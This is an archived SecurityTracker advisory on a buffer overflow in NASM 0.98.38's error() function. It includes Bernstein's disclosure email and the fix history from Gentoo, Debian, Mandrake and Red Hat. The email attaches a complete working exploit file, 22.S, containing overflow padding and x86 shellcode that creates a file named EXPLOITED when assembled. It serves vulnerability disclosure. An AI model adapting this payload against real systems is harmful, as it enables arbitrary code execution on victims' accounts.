SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Generic)  >   NASM Vendors:   nasm.sourceforge.net
NASM Buffer Overflow in error() Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1012565
SecurityTracker URL:  http://securitytracker.com/id/1012565
CVE Reference:   CAN-2004-1287   (Links to External Site)
Updated:  Jan 6 2005
Original Entry Date:  Dec 16 2004
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.98.38
Description:   A vulnerability was reported in NASM. A remote user can cause arbitrary code to be executed by the target user.

D. J. Bernstein reported that a remote user can create a specially crafted asm file that, when processed by the target user with NASM, will execute arbitrary code on the target user's system. The code will run with the privileges of the target user.

The buffer overflow resides in the error() function in 'preproc.c'.

Jonathan Rockway is credited with discovering this flaw.

Impact:   A remote user can cause arbitrary code to be executed by the target user with the privileges of the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  nasm.sourceforge.net/wakka.php?wakka=HomePage (Links to External Site)
Cause:   Boundary error
Underlying OS:   Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Dec 20 2004 (Gentoo Issues Fix) NASM Buffer Overflow in error() Lets Remote Users Execute Arbitrary Code   (Luke Macken <lewk@gentoo.org>)
Gentoo has released a fix.
Jan 6 2005 (Debian Issues Fix) NASM Buffer Overflow in error() Lets Remote Users Execute Arbitrary Code   (joey@infodrom.org (Martin Schulze))
Debian has released a fix.
Jan 7 2005 (Mandrake Issues Fix) NASM Buffer Overflow in error() Lets Remote Users Execute Arbitrary Code   (Mandrake Linux Security Team <security@linux-mandrake.com>)
Mandrake has released a fix.
May 5 2005 (Red Hat Issues Fix) NASM Buffer Overflow in error() Lets Remote Users Execute Arbitrary Code   (bugzilla@redhat.com)
Red Hat has released a fix.



 Source Message Contents

Date:  15 Dec 2004 08:20:49 -0000
Subject:  [remote] [control] NASM 0.98.38 error() overflows buff[]



--9amGYk9869ThD9tj
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

Jonathan Rockway, a student in my Fall 2004 UNIX Security Holes course,
has discovered a remotely exploitable security hole in NASM. I'm
publishing this notice, but all the discovery credits should be assigned
to Rockway.

You are at risk if you receive an asm file from an email message (or a
web page or any other source that could be controlled by an attacker)
and feed that file through NASM. Whoever provides that asm file then has
complete control over your account: he can read and modify your files,
watch the programs you're running, etc.

Of course, if you _run_ a program, you're authorizing the programmer to
take control of your account; but the NASM documentation does not say
that merely _assembling_ a program can have this effect. It's easy to
imagine situations in which a program is run inside a jail but assembled
outside the jail; this NASM bug means that the jail is ineffective.

Proof of concept: On an x86 computer running FreeBSD 4.10, as root, type

   cd /usr/ports/devel/nasm
   make install

to download and compile the NASM program, version 0.98.38 (current).
Then, as any user, save the file 22.S attached to this message, and type

   nasm 22.S

with the unauthorized result that a file named EXPLOITED is created in
the current directory. (I tested this with a 525-byte environment, as
reported by printenv | wc -c.)

Here's the bug: In preproc.c, error() uses an unprotected vsprintf() to
copy data into a 1024-byte buff[] array.

---D. J. Bernstein, Associate Professor, Department of Mathematics,
Statistics, and Computer Science, University of Illinois at Chicago

--9amGYk9869ThD9tj
Content-Type: text/plain; charset=unknown-8bit
Content-Disposition: attachment; filename="22.S"
Content-Transfer-Encoding: quoted-printable

%error 0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=
=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=
=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=
=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=
=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=
=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=
=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=
=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=
=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=
=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=
=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=
=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=
=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=
=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=
=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=
=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=
=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=
=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=
=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=
=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=
=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=
=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=
=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=
=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=
=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=
=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=
=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=
=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=
=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=
=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=
=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=
=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=
=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=
=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=
=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=
=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=
=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=
=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=
=F4=BF=BF0=F4=BF=BF0=F4=BF=BF0=F4=BF=BFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAA=EB%Y1=C0@@@=C1=E0=07P=B8=124V=02=C1=E8=18=C1=E0=08PQ1=C0=B0=
=05P=CD=801=C0P@P=CD=80=E8=D6=FF=FF=FFEXPLOITED

--9amGYk9869ThD9tj--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC